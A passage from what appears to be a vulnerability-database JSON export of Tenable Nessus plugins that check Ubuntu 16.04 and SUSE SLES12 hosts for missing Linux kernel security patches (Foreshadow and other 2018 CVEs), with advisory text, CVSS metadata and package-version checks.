A local attacker could use this to cause a denial of\nservice (system crash) or execute arbitrary code. (CVE-2018-17182)\n\nIt was discovered that the paravirtualization implementation in the\nLinux kernel did not properly handle some indirect calls, reducing the\neffectiveness of Spectre v2 mitigations for paravirtual guests. A\nlocal attacker could use this to expose sensitive information.\n(CVE-2018-15594)\n\nIt was discovered that microprocessors utilizing speculative execution\nand prediction of return addresses via Return Stack Buffer (RSB) may\nallow unauthorized memory reads via sidechannel attacks. An attacker\ncould use this to expose sensitive information. (CVE-2018-15572)\n\nAndy Lutomirski and Mika Penttila discovered that the KVM\nimplementation in the Linux kernel did not properly check privilege\nlevels when emulating some instructions. An unprivileged attacker in a\nguest VM could use this to escalate privileges within the guest.\n(CVE-2018-10853)\n\nIt was discovered that a stack-based buffer overflow existed in the\niSCSI target implementation of the Linux kernel. A remote attacker\ncould use this to cause a denial of service (system crash).\n(CVE-2018-14633)\n\nIt was discovered that a memory leak existed in the IRDA subsystem of\nthe Linux kernel. A local attacker could use this to cause a denial of\nservice (kernel memory exhaustion). (CVE-2018-6554)\n\nIt was discovered that a use-after-free vulnerability existed in the\nIRDA implementation in the Linux kernel. A local attacker could use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2018-6555).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "UBUNTU_USN-3777-2.NASL", "href": "https://www.tenable.com/plugins/nessus/117873", "published": "2018-10-02T00:00:00", "title": "Ubuntu 16.04 LTS : linux-hwe, linux-gcp vulnerabilities (USN-3777-2)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3777-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(117873);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/09/18 12:31:48\");\n\n script_cve_id(\"CVE-2018-10853\", \"CVE-2018-14633\", \"CVE-2018-15572\", \"CVE-2018-15594\", \"CVE-2018-17182\", \"CVE-2018-6554\", \"CVE-2018-6555\");\n script_xref(name:\"USN\", value:\"3777-2\");\n\n script_name(english:\"Ubuntu 16.04 LTS : linux-hwe, linux-gcp vulnerabilities (USN-3777-2)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"USN-3777-1 fixed vulnerabilities in the Linux kernel for Ubuntu 18.04\nLTS. This update provides the corresponding updates for the Linux\nHardware Enablement (HWE) kernel from Ubuntu 18.04 LTS for Ubuntu\n16.04 LTS.\n\nJann Horn discovered that the vmacache subsystem did not properly\nhandle sequence number overflows, leading to a use-after-free\nvulnerability. A local attacker could use this to cause a denial of\nservice (system crash) or execute arbitrary code. 
(CVE-2018-17182)\n\nIt was discovered that the paravirtualization implementation in the\nLinux kernel did not properly handle some indirect calls, reducing the\neffectiveness of Spectre v2 mitigations for paravirtual guests. A\nlocal attacker could use this to expose sensitive information.\n(CVE-2018-15594)\n\nIt was discovered that microprocessors utilizing speculative execution\nand prediction of return addresses via Return Stack Buffer (RSB) may\nallow unauthorized memory reads via sidechannel attacks. An attacker\ncould use this to expose sensitive information. (CVE-2018-15572)\n\nAndy Lutomirski and Mika Penttila discovered that the KVM\nimplementation in the Linux kernel did not properly check privilege\nlevels when emulating some instructions. An unprivileged attacker in a\nguest VM could use this to escalate privileges within the guest.\n(CVE-2018-10853)\n\nIt was discovered that a stack-based buffer overflow existed in the\niSCSI target implementation of the Linux kernel. A remote attacker\ncould use this to cause a denial of service (system crash).\n(CVE-2018-14633)\n\nIt was discovered that a memory leak existed in the IRDA subsystem of\nthe Linux kernel. A local attacker could use this to cause a denial of\nservice (kernel memory exhaustion). (CVE-2018-6554)\n\nIt was discovered that a use-after-free vulnerability existed in the\nIRDA implementation in the Linux kernel. A local attacker could use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2018-6555).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3777-2/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-gcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-gcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-hwe-16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae-hwe-16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-gke\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency-hwe-16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-oem\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018-2019 Canonical, Inc. / NASL script (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04\", \"Ubuntu \" + release);\nif ( ! 
get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2018-10853\", \"CVE-2018-14633\", \"CVE-2018-15572\", \"CVE-2018-15594\", \"CVE-2018-17182\", \"CVE-2018-6554\", \"CVE-2018-6555\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3777-2\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.15.0-1021-gcp\", pkgver:\"4.15.0-1021.22~16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.15.0-36-generic\", pkgver:\"4.15.0-36.39~16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.15.0-36-generic-lpae\", pkgver:\"4.15.0-36.39~16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.15.0-36-lowlatency\", pkgver:\"4.15.0-36.39~16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-gcp\", pkgver:\"4.15.0.1021.35\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-generic-hwe-16.04\", pkgver:\"4.15.0.36.59\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-generic-lpae-hwe-16.04\", pkgver:\"4.15.0.36.59\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-gke\", pkgver:\"4.15.0.1021.35\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-lowlatency-hwe-16.04\", pkgver:\"4.15.0.36.59\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-oem\", pkgver:\"4.15.0.36.59\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = 
ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.15-gcp / linux-image-4.15-generic / etc\");\n}\n", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2019-11-03T12:23:02", "bulletinFamily": "scanner", "description": "This update for the Linux Kernel 4.4.114-94_14 fixes several issues.\nThe following security issues were fixed :\n\n - CVE-2018-3646: Local attackers in virtualized guest\n systems could use speculative code patterns on\n hyperthreaded processors to read data present in the L1\n Datacache used by other hyperthreads on the same CPU\n core, potentially leaking sensitive data, even from\n other virtual machines or the host system (bsc#1099306).\n\n - CVE-2017-18344: The timer_create syscall implementation\n in kernel/time/posix-timers.c didn", "modified": "2019-11-02T00:00:00", "id": "SUSE_SU-2018-2416-1.NASL", "href": "https://www.tenable.com/plugins/nessus/112016", "published": "2018-08-20T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2018:2416-1) (Foreshadow)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:2416-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(112016);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/09/10 13:51:48\");\n\n script_cve_id(\"CVE-2017-18344\", \"CVE-2018-10853\", \"CVE-2018-3646\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2018:2416-1) (Foreshadow)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the 
Linux Kernel 4.4.114-94_14 fixes several issues.\nThe following security issues were fixed :\n\n - CVE-2018-3646: Local attackers in virtualized guest\n systems could use speculative code patterns on\n hyperthreaded processors to read data present in the L1\n Datacache used by other hyperthreads on the same CPU\n core, potentially leaking sensitive data, even from\n other virtual machines or the host system (bsc#1099306).\n\n - CVE-2017-18344: The timer_create syscall implementation\n in kernel/time/posix-timers.c didn't properly validate\n the sigevent->sigev_notify field, which lead to\n out-of-bounds access in the show_timer function (called\n when /proc/$PID/timers is read). This allowed userspace\n applications to read arbitrary kernel memory (on a\n kernel built with CONFIG_POSIX_TIMERS and\n CONFIG_CHECKPOINT_RESTORE) (bsc#1103203). before 4.14.8\n\n - CVE-2018-10853: A flaw was found in kvm. In which\n certain instructions such as sgdt/sidt call\n segmented_write_std didn't propagate access correctly.\n As such, during userspace induced exception, the guest\n can incorrectly assume that the exception happened in\n the kernel and panic. (bsc#1097108).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1097108\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1099306\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1103203\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-18344/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-10853/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-3646/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20182416-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8f059202\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12-SP2:zypper in -t patch\nSUSE-SLE-SAP-12-SP2-2018-1667=1 SUSE-SLE-SAP-12-SP2-2018-1668=1\n\nSUSE Linux Enterprise Server 12-SP2-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2018-1667=1 SUSE-SLE-SERVER-12-SP2-2018-1668=1\n\nSUSE Linux Enterprise Live Patching 12-SP3:zypper in -t patch\nSUSE-SLE-Live-Patching-12-SP3-2018-1672=1\nSUSE-SLE-Live-Patching-12-SP3-2018-1673=1\nSUSE-SLE-Live-Patching-12-SP3-2018-1674=1\nSUSE-SLE-Live-Patching-12-SP3-2018-1675=1\nSUSE-SLE-Live-Patching-12-SP3-2018-1676=1\nSUSE-SLE-Live-Patching-12-SP3-2018-1677=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n 
script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-4_4_103-92_53-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-4_4_103-92_56-default\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/20\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! 
preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kgraft-patch-4_4_103-92_53-default-8-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kgraft-patch-4_4_103-92_56-default-8-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-11-03T12:22:57", "bulletinFamily": "scanner", "description": "This update for the Linux Kernel 4.4.114-92_67 fixes several issues.\nThe following security issues were fixed :\n\n - CVE-2018-3646: Local attackers in virtualized guest\n systems could use speculative code patterns on\n hyperthreaded processors to read data present in the L1\n Datacache used by other hyperthreads on the same CPU\n core, potentially leaking sensitive data, even from\n other virtual machines or the host system (bsc#1099306).\n\n - CVE-2017-18344: The timer_create syscall implementation\n in kernel/time/posix-timers.c didn", "modified": "2019-11-02T00:00:00", "id": "SUSE_SU-2018-2391-1.NASL", "href": "https://www.tenable.com/plugins/nessus/111842", "published": "2018-08-17T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2018:2391-1) (Foreshadow)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:2391-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111842);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/09/10 13:51:48\");\n\n 
script_cve_id(\"CVE-2017-18344\", \"CVE-2018-10853\", \"CVE-2018-3646\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2018:2391-1) (Foreshadow)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 4.4.114-92_67 fixes several issues.\nThe following security issues were fixed :\n\n - CVE-2018-3646: Local attackers in virtualized guest\n systems could use speculative code patterns on\n hyperthreaded processors to read data present in the L1\n Datacache used by other hyperthreads on the same CPU\n core, potentially leaking sensitive data, even from\n other virtual machines or the host system (bsc#1099306).\n\n - CVE-2017-18344: The timer_create syscall implementation\n in kernel/time/posix-timers.c didn't properly validate\n the sigevent->sigev_notify field, which lead to\n out-of-bounds access in the show_timer function (called\n when /proc/$PID/timers is read). This allowed userspace\n applications to read arbitrary kernel memory (on a\n kernel built with CONFIG_POSIX_TIMERS and\n CONFIG_CHECKPOINT_RESTORE) (bsc#1103203). before 4.14.8\n\n - CVE-2018-10853: A flaw was found in kvm. In which\n certain instructions such as sgdt/sidt call\n segmented_write_std didn't propagate access correctly.\n As such, during userspace induced exception, the guest\n can incorrectly assume that the exception happened in\n the kernel and panic. (bsc#1097108).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1097108\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1099306\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1103203\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-18344/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-10853/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-3646/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20182391-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a8f96945\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12-SP2:zypper in -t patch\nSUSE-SLE-SAP-12-SP2-2018-1649=1 SUSE-SLE-SAP-12-SP2-2018-1650=1\nSUSE-SLE-SAP-12-SP2-2018-1652=1 SUSE-SLE-SAP-12-SP2-2018-1653=1\n\nSUSE Linux Enterprise Server 12-SP2-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2018-1649=1 SUSE-SLE-SERVER-12-SP2-2018-1650=1\nSUSE-SLE-SERVER-12-SP2-2018-1652=1 SUSE-SLE-SERVER-12-SP2-2018-1653=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n 
script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-4_4_114-92_64-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-4_4_114-92_67-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-4_4_90-92_45-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-4_4_90-92_50-default\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/17\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! 
preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kgraft-patch-4_4_114-92_64-default-6-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kgraft-patch-4_4_114-92_67-default-6-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kgraft-patch-4_4_90-92_45-default-9-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kgraft-patch-4_4_90-92_50-default-9-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-11-03T12:22:55", "bulletinFamily": "scanner", "description": "This update for the Linux Kernel 4.4.74-92_38 fixes several issues.\nThe following security issues were fixed :\n\n - CVE-2018-3646: Local attackers in virtualized guest\n systems could use speculative code patterns on\n hyperthreaded processors to read data present in the L1\n Datacache used by other hyperthreads on the same CPU\n core, potentially leaking sensitive data, even from\n other virtual machines or the host system (bsc#1099306).\n\n - CVE-2017-18344: The timer_create syscall implementation\n in kernel/time/posix-timers.c didn", "modified": "2019-11-02T00:00:00", "id": "SUSE_SU-2018-2387-1.NASL", "href": "https://www.tenable.com/plugins/nessus/111839", "published": "2018-08-17T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2018:2387-1) (Foreshadow)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted 
